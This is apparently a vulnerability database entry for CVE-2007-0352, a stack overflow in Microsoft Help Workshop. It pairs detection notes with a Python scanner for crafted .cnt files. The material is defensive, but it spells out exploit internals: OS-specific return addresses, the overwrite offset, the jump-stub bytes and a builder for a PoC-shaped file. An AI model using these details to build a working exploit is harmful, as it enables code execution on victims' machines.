CVE-2007-0352
published 2007-01-19


Priority: P3 47 · Severity: critical · CVSS 2.0 base score: 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
Flags: EXPLOIT
EPSS: 36.38% (98.3rd percentile)
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string.

Affected (1 range)

Vendor: microsoft
Product: html_help_workshop
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

filename: .cnt
version: Microsoft Help Workshop 4.03.0002
other: jmpEspPtr: 0x7cfdbd1b (OS index 0)
other: jmpEspPtr: 0x784452e4 (OS index 1)
other: jmpEspPtr: 0x7d0812e4 (OS index 2)
other: jmpEspPtr: 0x7cc58fd8 (OS index 3)
other: jmpEspPtr: 0x775e6247 (OS index 4)
bytes: 0xe9,0x1b,0xfe,0xff,0xff
  • Malicious .cnt files triggering this vulnerability begin each line with an integer followed by a space and a long string — detect anomalously long lines (>500 bytes) in .cnt files opened by Help Workshop (hcw.exe).
  • The exploit payload embeds the ASCII marker string '0 Microsoft Help Workshop PoC exploit by porkythepig' at the start of the crafted .cnt file; scan file content for this string.
  • The exploit buffer is exactly 619 bytes; a .cnt file of exactly this size containing shellcode is a strong indicator of exploitation.
  • The return address overwrite occurs at offset 0x210 (528 bytes) into the exploit buffer; stack inspection or crash analysis showing EIP control at this offset confirms exploitation.
  • The backward jump stub (0xe9,0x1b,0xfe,0xff,0xff) is written at offset 0x218 in the buffer to redirect execution back into the shellcode; presence of this 5-byte near-jump sequence near the overwrite region is a shellcode indicator.
  • Monitor hcw.exe (Microsoft Help Workshop) for spawning unexpected child processes such as notepad.exe or other user-supplied executables, which is the payload delivery mechanism of this exploit.
  • The exploit ships five hardcoded OS-specific API address tables (jmpEspPtr and API pointers); the correct table must match the target OS/DLL version — detections relying on specific return addresses will only match the targeted OS variant.
  • The vulnerability is user-assisted (requires the victim to open a crafted .cnt file); exploitation is not remote/unauthenticated without a social-engineering vector.
  • Microsoft Help Workshop 4.03.0002 is a standard component of MS Visual Studio 6.0 and 2003 (.NET); the attack surface exists on any developer workstation with these IDE versions installed.
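A small scanner that applies the heuristics listed above to the raw bytes of a .cnt file, checking the PoC marker string, the 5-byte near-jump stub, the 619-byte buffer size and the structural "integer, space, oversized string" line shape. This is an added example, not tooling from this page or from any vendor; the function names, the sample files and the way the thresholds are applied are constructed for illustration.

```python
import re
import sys
from typing import List

# Indicators quoted in the detection notes above; thresholds reused as given there.
POC_MARKER = b"0 Microsoft Help Workshop PoC exploit by porkythepig"
JMP_STUB = bytes([0xE9, 0x1B, 0xFE, 0xFF, 0xFF])   # 5-byte near jump back into the buffer
LONG_LINE = 500        # bytes after "<int><space>" beyond which a topic line is anomalous
EXPLOIT_SIZE = 619     # total size of the known exploit buffer
TOPIC_LINE = re.compile(rb"^(\d+) (.*)$", re.DOTALL)  # .cnt topic line: integer, space, title

def scan_cnt(data: bytes) -> List[str]:
    """Return the names of the indicators present in the raw bytes of a .cnt file."""
    hits: List[str] = []
    if POC_MARKER in data:
        hits.append("poc_marker_string")
    if JMP_STUB in data:
        hits.append("near_jump_stub")
    if len(data) == EXPLOIT_SIZE:
        hits.append("exploit_buffer_size")
    for line in data.split(b"\n"):
        m = TOPIC_LINE.match(line.rstrip(b"\r"))
        if m and len(m.group(2)) > LONG_LINE:
            hits.append("long_topic_line")   # structural check: also catches re-padded variants
            break
    return hits

def benign_sample() -> bytes:
    """Constructed, well-formed contents file for comparison."""
    return b":Base sample.hlp\r\n1 Introduction=intro\r\n2 Usage=usage\r\n"

def suspicious_sample() -> bytes:
    """Constructed file with the shape of the PoC: marker line, then one oversized topic
    line ending in the jump stub, padded to the known 619-byte size (no shellcode)."""
    head = POC_MARKER + b"\r\n1 "
    return head + b"A" * (EXPLOIT_SIZE - len(head) - len(JMP_STUB)) + JMP_STUB

if __name__ == "__main__":
    # usage: python scan_cnt.py file1.cnt file2.cnt ...
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, scan_cnt(fh.read()) or "clean")
```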